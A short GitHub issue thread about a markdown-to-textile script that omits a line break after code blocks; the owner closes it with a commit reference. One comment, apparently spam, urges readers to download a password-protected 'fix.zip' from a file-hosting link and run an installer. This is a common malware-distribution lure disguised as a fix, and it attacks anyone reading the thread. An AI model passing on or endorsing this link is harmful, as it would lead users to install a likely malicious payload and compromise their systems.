### ISSUE TITLE
No line break after code block

### ISSUE THREAD

**Issue by ryota37** [ryota37/markdown_to_textile#1]
I noticed that there is no line break after code block in the text generated by the script.
This can cause inappropriate display of the text.

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ryota37** [comment]
Solved in this commit 
d0e8640c0de11931ab5ec40e71091c4d445c7dfc
